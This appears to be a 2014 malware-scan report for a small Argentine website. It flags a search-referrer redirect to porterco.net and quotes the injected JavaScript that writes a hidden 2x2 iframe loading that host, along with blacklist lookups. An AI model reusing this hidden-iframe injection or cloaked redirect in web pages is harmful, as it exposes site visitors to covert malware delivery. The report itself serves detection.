Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://marialauraweb.com.ar/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: marialauraweb.com.ar Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 03:51:12 GMT Location: http://porterco.net/counter.php Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 428 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://marialauraweb.com.ar/ | 200 OK Content-Length: 2383 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript"> document.write('<iframe src="http://porterco.net/counter.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script> Hidden iFrame found. size: 2x2 src: http://porterco.net/counter.php <iframe src="http://porterco.net/counter.php" name="twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://marialauraweb.com.ar/test404page.js | 404 Not Found Content-Length: 520 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=marialauraweb.com.ar
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://marialauraweb.com.ar/
Result: marialauraweb.com.ar is not infected or malware details are not published yet.
Result: marialauraweb.com.ar is not infected or malware details are not published yet.